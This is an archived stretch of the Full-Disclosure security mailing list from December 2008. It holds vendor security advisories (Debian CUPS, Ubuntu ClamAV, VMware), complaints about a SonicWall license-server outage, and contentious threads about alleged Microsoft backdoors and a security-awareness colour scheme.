> If you are taking a proactive approach to security, maybe you should always
> remind the user to be careful with their data.
> How about 'all desktops have an icon or widget (say at the right hand
> corner)' that flashes red every five minutes and says 'be careful with the
> data you share.' This solution removes the overhead of all that pesky
> monitoring and data mining.
>

From ureleet at gmail.com Tue Dec 2 18:11:18 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 13:11:18 -0500
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To:
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com>
Message-ID: <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com>

all speculation: no 1 knows 4 sure.

http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss
http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm

c how i did that n3td3v? i posted links, nd talked about the article
w/out stealing ppls work. pay attention.

On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote:
> 2008/12/2 Ureleet
>>
>> u arent getting it.
>>
>> it has nothing 2 do w/ backdoors. they r talking about actual
>> backdoors in the code. so that anyone who knows the backdoor can
>> acess any windows system regarless. they r saying that microsoft has
>> coded backdoors into the system so that the govt can get into any
>> system, patched or not. pay attention.
>
> I haven't seen anything that suggests that systems are/will be backdoored
> here. The text of the statement said "remote searches" which in legal terms
> could be anything from something as simple as browsing shared files
> available through P2P to full remote system access.
>
> Do you have anything else that suggests Windows has backdoors present other
> than this statement?
> From it.security.lists at gmail.com Tue Dec 2 19:14:43 2008 From: it.security.lists at gmail.com (IT Security) Date: Tue, 2 Dec 2008 14:14:43 -0500 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected Message-ID: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> Sonicwall (makers of various security products) has had their license manager (server) go haywire overnight and it's "reset" (meaning invalidated) the licenses on all of their email security products. This means customers can't login to their own systems (a good case against draconian DRM like this). Calls to support have gone straight to voicemail all morning, and no ETA for resolution yet exists. This is affecting **all** of their customers, as far as I can tell (and based on what I'm told by their general support ticket-taker). Their forum (probably requires registration) is full of complaints about it. Screenshots of it and other problem areas are available on request .. but I don't want to email them to this entire list). The first alert was these warnings : ---------------------------------------------------------------- ~~ SonicWALL Email Security Alert (6.2.2.1071) ~~ ---------------------------------------------------------------- [Summary: Your Email Security licenses have been reset.] Details: Host Name: **ourmailhost** Description: The Email Security licenses have been reset at 12/02/2008 04:18 EST. The email filtering will not be working. TimeStamp: LocalTime: Tue Dec 2 04:18:49 2008 GMT: Tue Dec 2 09:18:49 2008 Additional Information: Recommended Action: Please contact SonicWall Technical Support. A response from their technical support on the issue went like this : "The issue is on our backend server who stores the registrations, some ES appliances got licences resetted. The exact cause is still being analized with high priority. In those cases entering the mysonicwall credentials or uploading file solve the issue. 
Kind Regards Ivan"

And as of now, their license server is **still** off-line :

$ telnet licensemanager.sonicwall.com 443
Trying 204.212.170.143...
telnet: Unable to connect to remote host: Connection refused

DRM schemes like this only cause problems for the LEGITIMATE customers .

From elazar at hushmail.com Tue Dec 2 19:36:12 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 02 Dec 2008 14:36:12 -0500
Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected
Message-ID: <20081202193612.7C420118041@smtp.hushmail.com>

I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.

On Tue, 02 Dec 2008 14:14:43 -0500 IT Security wrote:
>Sonicwall (makers of various security products) has had their license
>manager (server) go haywire overnight and it's "reset" (meaning invalidated)
>the licenses on all of their email security products. This means customers
>can't login to their own systems (a good case against draconian DRM like
>this). Calls to support have gone straight to voicemail all morning, and no
>ETA for resolution yet exists.
>
>This is affecting **all** of their customers, as far as I can tell (and
>based on what I'm told by their general support ticket-taker).
>
>Their forum (probably requires registration) is full of complaints about it.
>Screenshots of it and other problem areas are available on request .. but I
>don't want to email them to this entire list).
>
>The first alert was these warnings :
>
>----------------------------------------------------------------
>~~ SonicWALL Email Security Alert (6.2.2.1071) ~~
>----------------------------------------------------------------
>
>[Summary: Your Email Security licenses have been reset.]
>
>Details:
>Host Name: **ourmailhost**
>Description: The Email Security licenses have been reset at
>12/02/2008 04:18 EST. The email filtering will not be working.
>
>TimeStamp:
>LocalTime: Tue Dec 2 04:18:49 2008
>GMT: Tue Dec 2 09:18:49 2008
>
>Additional Information:
>Recommended Action: Please contact SonicWall Technical Support.
>
>A response from their technical support on the issue went like this :
>
>"The issue is on our backend server who stores the registrations, some ES
>appliances got licences resetted. The exact cause is still being analized
>with high priority. In those cases entering the mysonicwall credentials or
>uploading file solve the issue. Kind Regards Ivan"
>
>And as of now, their license server is **still** off-line :
>
>$ telnet licensemanager.sonicwall.com 443
>Trying 204.212.170.143...
>telnet: Unable to connect to remote host: Connection refused
>
>DRM schemes like this only cause problems for the LEGITIMATE customers .

From elazar at hushmail.com Tue Dec 2 19:29:22 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 02 Dec 2008 14:29:22 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
Message-ID: <20081202192922.62A6C118041@smtp.hushmail.com>

On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad wrote:
>Mike C wrote:
>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
>>
>>> and how does making a color based on these inputs protect people?
>>>
>>
>> Once all desktops have an icon or widget (say at the right hand
>> corner) with the color, and this is consistently seen everywhere, the
>> users will start associating with their online security. they will be
>> reminded that they have to be careful with the data they share.
>>
>> This, if implemented correctly will be a boon to security industry,
>> where the weakest kinks currently are 'n00b' users.
>>
>you are joking right?
>
>So some widget is going to stop the next SMB remote or IE client side
>and protect the 'n00b' users? Please explain how this works. Also please
>explain how "they will be reminded that they have to be careful with the
>data they share. " has anything to do with protecting a users machine
>from being compromised.

That's the whole point. There is a fine line between using visual alerts
to put people (Joe six pack) into a state of "awareness" (more like mild
hysteria) of a threat versus knowing how to protect oneself against that
threat and using that awareness indicator as the kick in the ass to get
moving and shore up the defenses (hell, how many security folk do this
too, then again, every time something goes bump we see red).
Visual alerts are great as persuasion tools, especially when the goal is
to get Joe to buy your latest
all-in-one-will-make-your-coffee-and-buy-you-beer
AV/Malware/Spyware/Foo (what's this doing here?)/evil monkey in the closet
package. So of course, Joe will never learn how to properly defend his
computer/data, and the "industry" will prosper. Now, thanks to our good
friends over at the DHS, the color system has turned into a complete and
utter joke (for the most part), so my friend, you see, this is a complete
exercise in futility (besides the fact that every friggin
AV/IDS/Security/SIM company out there has red, yellow and green as their
corporate "flag", if you are just joining the party, then you can
completely ignore this)

If you really want to change state of security for the n00bs, spread
the knowledge, not the colors.

My .02...

elazar

From nytrokiss at gmail.com Tue Dec 2 20:08:34 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Tue, 2 Dec 2008 22:08:34 +0200
Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected
In-Reply-To: <20081202193612.7C420118041@smtp.hushmail.com>
References: <20081202193612.7C420118041@smtp.hushmail.com>
Message-ID: <8a6b8e350812021208p7397f68ah9cb6eb8100d642fe@mail.gmail.com>

I am sure Sonic wall is going to lose many customers and other companies
should learn and not put DRM in their products. I hope this will teach them.

On Tue, Dec 2, 2008 at 9:36 PM, Elazar Broad wrote:
> I stopped using SonicWall when I learned I had to purchase a whole
> new device for a customer that just wanted to add a few more
> machines to their network, instead of bumping the license like most
> "normal" vendors.
>
> On Tue, 02 Dec 2008 14:14:43 -0500 IT Security wrote:
> >Sonicwall (makers of various security products) has had their license
> >manager (server) go haywire overnight and it's "reset" (meaning invalidated)
> >the licenses on all of their email security products. This means customers
> >can't login to their own systems (a good case against draconian DRM like
> >this). Calls to support have gone straight to voicemail all morning, and no
> >ETA for resolution yet exists.
> >
> >This is affecting **all** of their customers, as far as I can tell (and
> >based on what I'm told by their general support ticket-taker).
> >
> >Their forum (probably requires registration) is full of complaints about it.
> >Screenshots of it and other problem areas are available on request .. but I
> >don't want to email them to this entire list).
> >
> >The first alert was these warnings :
> >
> >----------------------------------------------------------------
> >~~ SonicWALL Email Security Alert (6.2.2.1071) ~~
> >----------------------------------------------------------------
> >
> >[Summary: Your Email Security licenses have been reset.]
> >
> >Details:
> >Host Name: **ourmailhost**
> >Description: The Email Security licenses have been reset at
> >12/02/2008 04:18 EST. The email filtering will not be working.
> >
> >TimeStamp:
> >LocalTime: Tue Dec 2 04:18:49 2008
> >GMT: Tue Dec 2 09:18:49 2008
> >
> >Additional Information:
> >Recommended Action: Please contact SonicWall Technical Support.
> >
> >A response from their technical support on the issue went like this :
> >
> >"The issue is on our backend server who stores the registrations, some ES
> >appliances got licences resetted. The exact cause is still being analized
> >with high priority. In those cases entering the mysonicwall credentials or
> >uploading file solve the issue. Kind Regards Ivan"
> >
> >And as of now, their license server is **still** off-line :
> >
> >$ telnet licensemanager.sonicwall.com 443
> >Trying 204.212.170.143...
> >telnet: Unable to connect to remote host: Connection refused
> >
> >DRM schemes like this only cause problems for the LEGITIMATE customers .
>

--
http://www.astorandblack.com/
http://www.jewelerslounge.com/liberty-coin-cufflinks

From joey at infodrom.org Tue Dec 2 21:09:10 2008
From: joey at infodrom.org (Martin Schulze)
Date: Tue, 2 Dec 2008 22:09:10 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1677-1] New CUPS packages fix arbitrary code execution
Message-ID: <20081202210910.50C4D2B3E1B@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1677-1                    security at debian.org
http://www.debian.org/security/                               Martin Schulze
December 2nd, 2008                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : cupsys
Vulnerability  : integer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2008-5286
Debian Bug     : 507183

An integer overflow has been discovered in the image validation code
of cupsys, the Common UNIX Printing System. An attacker could trigger
this bug by supplying a malicious graphic that could lead to the
execution of arbitrary code.

For the stable distribution (etch) this problem has been fixed in
version 1.2.7-4etch6.

For testing distribution (lenny) this issue will be fixed soon.

For the unstable distribution (sid) this problem has been fixed in
version 1.3.8-1lenny4.

We recommend that you upgrade your cupsys packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJNaPhW5ql+IAeqTIRAiX7AJwJd3Szo5tvpYyBrqggsDuPSulvKACfVJsa
EwALyW+6s+Lgp2d1GI2ong4=
=R0SH
-----END PGP SIGNATURE-----

From kees at ubuntu.com Tue Dec 2 22:20:25 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 2 Dec 2008 14:20:25 -0800
Subject: [Full-disclosure] [USN-684-1] ClamAV vulnerability
Message-ID: <20081202222025.GH25309@outflux.net>

===========================================================
Ubuntu Security Notice USN-684-1          December 02, 2008
clamav vulnerability
https://bugs.launchpad.net/bugs/304017
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libclamav5                      0.94.dfsg.2-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Ilja van Sprundel discovered that ClamAV did not handle recursive JPEG
information. If a remote attacker sent a specially crafted JPEG file,
ClamAV would crash, leading to a denial of service.
Updated packages for Ubuntu 8.10:
From security at vmware.com Wed Dec 3 05:24:01 2008
From: security at vmware.com (VMware Security team)
Date: Tue, 02 Dec 2008 21:24:01 -0800
Subject: [Full-disclosure] VMSA-2008-0019 VMware Hosted products and patches for ESX and ESXi resolve a critical security issue and update bzip2
Message-ID: <493617F1.5070403@vmware.com>

-------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2008-0019
Synopsis:          VMware Hosted products and patches for ESX and ESXi
                   resolve a critical security issue and update bzip2
Issue date:        2008-12-02
Updated on:        2008-12-02 (initial release of advisory)
CVE numbers:       CVE-2008-4917 CVE-2008-1372
-------------------------------------------------------------------------

1. Summary

   Updated VMware Hosted products and patches for ESX and ESXi resolve
   two security issues. The first is a critical memory corruption
   vulnerability in virtual device hardware. The second is an updated
   bzip2 package for the Service Console.

2. Relevant releases

   VMware Workstation 6.0.5 and earlier,
   VMware Workstation 5.5.8 and earlier,
   VMware Player 2.0.5 and earlier,
   VMware Player 1.0.8 and earlier,
   VMware Server 1.0.9 and earlier,

   VMware ESXi 3.5 without patch ESXe350-200811401-O-SG

   VMware ESX 3.5 without patches ESX350-200811406-SG and
                                  ESX350-200811401-SG

   VMware ESX 3.0.3 without patches ESX303-200811404-SG and
                                    ESX303-200811401-BG

   VMware ESX 3.0.2 without patches ESX-1006980 and ESX-1006982

   NOTE: Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08.
         Users should plan to upgrade to ESX 3.0.3 and preferably to
         the newest release available.

3. Problem Description

 a. Critical Memory corruption vulnerability

    A memory corruption condition may occur in the virtual machine
    hardware. A malicious request sent from the guest operating
    system to the virtual hardware may cause the virtual hardware to
    write to uncontrolled physical memory.

    VMware would like to thank Andrew Honig of the Department of
    Defense for reporting this issue.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4917 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running   Replace with/
    Product        Version   on        Apply Patch
    =============  ========  ========  =================
    VirtualCenter  any       Windows   not affected

    Workstation    6.5.x     any       not affected
    Workstation    6.0.x     any       6.5.0 build 118166 or later
    Workstation    5.x       any       5.5.9 build 126128 or later

    Player         2.5.x     any       not affected
    Player         2.0.x     any       2.5.0 build 118166 or later
    Player         1.x       any       1.0.9 build 126128 or later

    ACE            2.5.x     Windows   not affected
    ACE            2.0.x     Windows   2.5.0 build 118166 or later
    ACE            1.x       Windows   1.0.8 build 125922 or later

    Server         2.x       any       not affected
    Server         1.x       any       1.0.8 build 126538 or later

    Fusion         2.x       Mac OS/X  not affected
    Fusion         1.x       Mac OS/X  upgrade to Fusion 2.0 or later

    ESXi           3.5       ESXi      ESXe350-200811401-O-SG

    ESX            3.5       ESX       ESX350-200811401-SG
    ESX            3.0.3     ESX       ESX303-200811401-BG
    ESX            3.0.2     ESX       ESX-1006980
    ESX            2.5.5     ESX       not affected

 b. Updated Service Console package bzip2

    bzip2 versions before 1.0.5 can crash if certain flaws in compressed
    data lead to reading beyond the end of a buffer. This might cause
    an application linked to the libbz2 library to crash when
    decompressing malformed archives.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-1372 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running   Replace with/
    Product        Version   on        Apply Patch
    =============  ========  ========  =================
    VirtualCenter  any       Windows   not affected

    hosted *       any       any       not affected

    ESXi           3.5       ESXi      not affected

    ESX            3.5       ESX       ESX350-200811406-SG
    ESX            3.0.3     ESX       ESX303-200811404-SG
    ESX            3.0.2     ESX       ESX-1006982
    ESX            2.5.5     ESX       affected, patch pending

    * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   VMware Workstation 5.5.9
   ------------------------
   http://www.vmware.com/download/ws/ws5.html
   Release notes:
   http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html

   Windows binary:
   md5sum: 509c7b323a8ac42c0a92b0a1446bb0f8

   Compressed Tar archive for 32-bit Linux
   md5sum: 9d189e72f8111e44b27f1ee92edf265e

   Linux RPM version for 32-bit Linux
   md5sum: 0957c5258d033d0107517df64bfea240

   VMware Player 1.0.9
   -------------------
   http://www.vmware.com/download/player/
   Release notes Player 1.x:
   http://www.vmware.com/support/player/doc/releasenotes_player.html

   Windows binary
   md5sum: e2c8dd7b27df7d348f14f69de017b93f

   Player 1.0.9 for Linux (.rpm)
   md5sum: 471c3881fa60b058b1dac1d3c9c32c85

   Player 1.0.9 for Linux (.tar)
   md5sum: bef507811698e7333f5e8cb672530dbf

   VMware Server 1.0.8
   -------------------
   http://www.vmware.com/download/server/
   Release notes:
   http://www.vmware.com/support/server/doc/releasenotes_server.html

   VMware Server for Windows 32-bit and 64-bit
   md5sum: 4ba41e5fa192f786121a7395ebaa8d7c

   VMware Server Windows client package
   md5sum: f25746e275ca00f28d44ad372fc92536

   VMware Server for Linux
   md5sum: a476d3953ab1ff8457735e692fa5edf9

   VMware Server for Linux rpm
   md5sum: af6890506618fa82928fbfba8a5f97e1

   Management Interface
   md5sum: 5982b84a39479cabce63e12ab664d369

   VMware Server Linux client package
   md5sum: 605d7db48f63211cc3f5ddb2b3f915a6

   ESXi
   ----
   ESXi 3.5 patch ESXe350-200811401-O-SG
   http://download3.vmware.com/software/vi/ESXe350-200811401-O-SG.zip
   md5sum: e895c8cb0d32b722d7820d0214416092
   http://kb.vmware.com/kb/1007507

   NOTE: The three ESXi patches for Firmware "I", VMware Tools "T,"
         and the VI Client "C" are contained in a single offline "O"
         download file.

   ESX
   ---
   ESX 3.5 patch ESX350-200811401-SG (memory corruption)
   http://download3.vmware.com/software/vi/ESX350-200811401-SG.zip
   md5sum: 988042ce20ce2381216fbe1862c3e66d
   http://kb.vmware.com/kb/1007501

   ESX 3.5 patch ESX350-200811406-SG (bzip2)
   http://download3.vmware.com/software/vi/ESX350-200811406-SG.zip
   md5sum: 285ec405ac34a196cbb796922e22cca2
   http://kb.vmware.com/kb/1007504

   ESX 3.0.3 patch ESX303-200811401-BG (memory corruption)
   http://download3.vmware.com/software/vi/ESX303-200811401-BG.zip
   md5sum: 26bf687a3483951d1f14ab66edf1d196
   http://kb.vmware.com/kb/1006986

   ESX 3.0.3 patch ESX303-200811404-SG (bzip2)
   http://download3.vmware.com/software/vi/ESX303-200811404-SG.zip
   md5sum: 2707e4a599867b0444e85a75a471ed4f
   http://kb.vmware.com/kb/1007198

   ESX 3.0.2 patch ESX-1006980 (memory corruption)
   http://download3.vmware.com/software/vi/ESX-1006980.tgz
   md5sum: 5e73f1585fea3ee770b2df2b94e73ca4
   http://kb.vmware.com/kb/1006980

   ESX 3.0.2 patch ESX-1006982 (bzip2)
   http://download3.vmware.com/software/vi/ESX-1006982.tgz
   md5sum: 4921cf542b5979bd0eef7f2c15683b71
   http://kb.vmware.com/kb/1006982

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4917
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372

-------------------------------------------------------------------------
6. Change log

2008-12-02  VMSA-2008-0019
Initial security advisory after release of patches for ESXi, ESX 3.5,
ESX 3.0.3, ESX 3.0.2. Updated hosted products were previously released
on 2008-11-06.

-------------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc. All rights reserved.

From my.security.lists at gmail.com Wed Dec 3 07:17:29 2008
From: my.security.lists at gmail.com (Rob Thompson)
Date: Tue, 02 Dec 2008 23:17:29 -0800
Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected
In-Reply-To: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com>
References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com>
Message-ID: <49363289.2020508@gmail.com>

IT Security wrote:
> DRM schemes like this only cause problems for the LEGITIMATE customers .

And to think that you paid a very good amount of money for that level of
service.

We all know that there is no level of DRM that can protect anything.
Where there is a will, there is a way. Your statement of affecting only
legitimate customers is dead on the money.

Time to start voting with dollars and holding companies accountable.
This state of eating whatever they spoon feed to us needs to end. We
all allowed this to happen.

>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


--
Rob

+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|                         _   |
|  ASCII ribbon campaign ( )  |
|   - against HTML email  X   |
|                        / \  |
|                             |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

From xploitable at gmail.com Wed Dec 3 08:34:56 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 08:34:56 +0000
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To: <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com>
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com>
	<4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com>
	<4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com>
	<6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com>
	<6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com>
Message-ID: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com>

You're like a shite that won't flush away.

On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote:
> all speculation:
>
> no 1 knows 4 sure.
>
> http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss
>
> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
>
> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>
> c how i did that n3td3v? i posted links, nd talked about the article
> w/out stealing ppls work.
>
> pay attention.
>
>
> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote:
>> 2008/12/2 Ureleet
>>>
>>> u arent getting it.
>>>
>>> it has nothing 2 do w/ backdoors. they r talking about actual
>>> backdoors in the code. so that anyone who knows the backdoor can
>>> acess any windows system regarless. they r saying that microsoft has
>>> coded backdoors into the system so that the govt can get into any
>>> system, patched or not. pay attention.
>>
>> I haven't seen anything that suggests that systems are/will be backdoored
>> here. The text of the statement said "remote searches" which in legal terms
>> could be anything from something as simple as browsing shared files
>> available through P2P to full remote system access.
>>
>> Do you have anything else that suggests Windows has backdoors present other
>> than this statement?
>>
>

From xploitable at gmail.com Wed Dec 3 08:43:20 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 08:43:20 +0000
Subject: [Full-disclosure] News for Ureleet
Message-ID: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>

I don't write news articles and I copy and paste abstracts from them,
welcome to fair use. If I wanted to be a news journalist I wouldn't be
a security researcher and ethical hacker.

http://en.wikipedia.org/wiki/Fair_use

From xploitable at gmail.com Wed Dec 3 09:13:20 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 09:13:20 +0000
Subject: [Full-disclosure] Big database for email and mobile text messages expected to be scrapped by Queen
Message-ID: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com>

A communications data Bill, paving the way for a massive database of
phone calls and emails, and a heritage protection Bill are also said
to have been scrapped to make way for economic measures.

http://news.sky.com/skynews/Home/Politics/The-Queens-Speech-Expected-To-Have-Economic-Measures-At-Its-Heart/Article/200812115171233?lpos=Politics_First_Home_Article_Teaser_Region_1&lid=ARTICLE_15171233_The_Queens_Speech_Expected_To_Have_Economic_Measures_At_Its_Heart

From xploitable at gmail.com Wed Dec 3 09:30:23 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 09:30:23 +0000
Subject: [Full-disclosure] Big database for email and mobile text messages expected to be scrapped by Queen
In-Reply-To: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com>
References: <4b6ee9310812030113g5ee47f84nefdb43998d58ad5@mail.gmail.com>
Message-ID: <4b6ee9310812030130j36c3afbhe340e305200f2e8c@mail.gmail.com>

I hope they enjoy reading my emails, isn't that right Mi5, even though
you've been reading them for years and this bill *idea* was just there
to test public opinion to see if an age old intelligence service
operation would be accepted by the British public. :)

Fraid not old sunshine, though we know you're watching us anyway.

All the best and stuff,

n3td3v.

On Wed, Dec 3, 2008 at 9:13 AM, n3td3v wrote:
> A communications data Bill, paving the way for a massive database of
> phone calls and emails, and a heritage protection Bill are also said
> to have been scrapped to make way for economic measures.
>
> http://news.sky.com/skynews/Home/Politics/The-Queens-Speech-Expected-To-Have-Economic-Measures-At-Its-Heart/Article/200812115171233?lpos=Politics_First_Home_Article_Teaser_Region_1&lid=ARTICLE_15171233_The_Queens_Speech_Expected_To_Have_Economic_Measures_At_Its_Heart
>

From hijacka at googlemail.com Wed Dec 3 08:41:38 2008
From: hijacka at googlemail.com (pUm)
Date: Wed, 3 Dec 2008 09:41:38 +0100
Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected
In-Reply-To: <49363289.2020508@gmail.com>
References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com>
	<49363289.2020508@gmail.com>
Message-ID: <689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com>

https://licensemanager.sonicwall.com/newui/admin/admin.jsp

that's hilarious - it MUST be a kind of honeypot :P

2008/12/3 Rob Thompson :
> IT Security wrote:
>> DRM schemes like this only cause problems for the LEGITIMATE customers .
>
> And to think that you paid a very good amount of money for that level of
> service.
>
> We all know that there is no level of DRM that can protect anything.
> Where there is a will, there is a way. Your statement of affecting only
> legitimate customers is dead on the money.
>
> Time to start voting with dollars and holding companies accountable.
> This state of eating whatever they spoon feed to us needs to end. We
> all allowed this to happen.
>
>>
>>
>> ------------------------------------------------------------------------
>>
>
>
> --
> Rob
>
> +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
> |                         _   |
> |  ASCII ribbon campaign ( )  |
> |   - against HTML email  X   |
> |                        / \  |
> |                             |
> +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
>

From xploitable at gmail.com Wed Dec 3 09:53:50 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 09:53:50 +0000
Subject: [Full-disclosure] Iran executes IT expert who spied for Israel
In-Reply-To: <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com>
References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com>
	<4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com>
Message-ID: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com>

Did anyone think Gadi when they read this?

On Mon, Dec 1, 2008 at 10:25 PM, n3td3v wrote:
> ---------- Forwarded message ----------
> From: n3td3v
> Date: Mon, Dec 1, 2008 at 10:23 PM
> Subject: Iran executes IT expert who spied for Israel
> To: n3td3v
>
>
> "A COMPUTER expert has been executed in Iran after he confessed to
> working for Mossad, the Israeli intelligence service. This provides a
> rare insight into the intense espionage activity inside the Islamic
> republic."
>
> http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece
>

From viktor.larionov at salva.ee Wed Dec 3 10:22:57 2008
From: viktor.larionov at salva.ee (Viktor Larionov)
Date: Wed, 3 Dec 2008 12:22:57 +0200
Subject: [Full-disclosure] Iran executes IT expert who spied for Israel
In-Reply-To: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com>
Message-ID:

My friend,

I may disagree with Gadi on some points, but from my personal experience
Gadi is a really nice guy, and it's nice to chat with him. But let this
be my personal opinion, you shouldn't necessarily agree with me.

This or that way, from my personal point of view, I would never wish
anybody, even you, to end up in Iranian prison waiting for the execution.
(and it's not code execution I'm talking about :)

If you are still missing the point, you could just make a simple Google
on the topic to see what it is all about, e.g. here:
http://www.iran-e-sabz.org/news/torture.htm

It's kind of nice and cosy to sit somewhere in the US or UK in your nice
and cosy wheelchair making fun of someone's death...come to think about
it - kind of makes me sick. And that's really kind of a bad subject to
make fun of.

I seriously doubt you can name yourself ethical (hacker or whatever you
are) in the context of such statements. And I'm not even mentioning that
we are talking cyber security around here - I guess going on
personalities doesn't really match with the topic.

For all others, sorry for the offtop. This netdev/ur3l33t stuff starts
to get on my nerves too.

Cheers!
Viktor

---
Viktor Larionov
snr. system administrator
R&D team
Salva Kindlustuse AS
Parnu mnt. 16
10141 Tallinn
ESTONIA
tel: (+372) 683 0636, (+372) 680 0500
fax: (+372) 680 0501
gsm: (+372) 5668 6811
viktor.larionov at salva.ee

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
